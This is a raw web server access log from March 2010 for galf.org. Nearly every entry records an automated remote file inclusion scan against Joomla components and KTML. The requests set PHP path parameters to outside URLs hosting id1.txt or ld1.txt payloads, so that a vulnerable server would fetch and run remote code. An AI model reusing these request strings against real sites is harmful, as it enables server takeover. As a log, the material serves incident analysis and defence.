87.230.63.44 - - [01/Mar/2010:00:24:53 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:24:58 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:24:58 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:24:59 -0800] "GET /logs/access_090928.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:02 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:02 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:02 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:08 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:11 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:12 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:12 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:16 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:17 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:19 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:19 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:20 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [01/Mar/2010:00:25:32 -0800] "GET /logs/access_100215.log HTTP/1.0" 200 3473408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:33 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:25:33 -0800] "GET /logs/access_090907.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:25:33 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:25:34 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:38 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:38 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:25:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:40 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:25:48 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:25:57 -0800] "GET /logs/access_091026.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:29:33 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.119.103.16 - - [01/Mar/2010:00:29:33 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.119.103.16 - - [01/Mar/2010:00:29:33 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.119.103.16 - - [01/Mar/2010:00:30:19 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:30:19 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:30:19 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:30:29 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:31:36 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:31:36 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:31:36 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:31:36 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:31:58 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:31:59 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:31:59 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.29 - - [01/Mar/2010:00:32:08 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215)" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:00:32:21 -0800] "GET /logs/access_100222.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:37:18 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:38 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:38 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:38 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:48 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:48 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:48 -0800] "GET /logs/access_090817.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:37:56 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:37:56 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:38:12 -0800] "GET /logs/access_090824.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:38:19 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:01 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:01 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:01 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:03 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:03 -0800] "GET /logs/access_100215.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:03 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:39:32 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:05 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:07 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:07 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:11 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:11 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:13 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:15 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:19 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:19 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:40:20 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:26 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:26 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:26 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:27 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:28 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:28 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:28 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:40 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:41 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:42 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:42 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:42 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:43 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:40:43 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:40:44 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:40:44 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:44 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:46 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
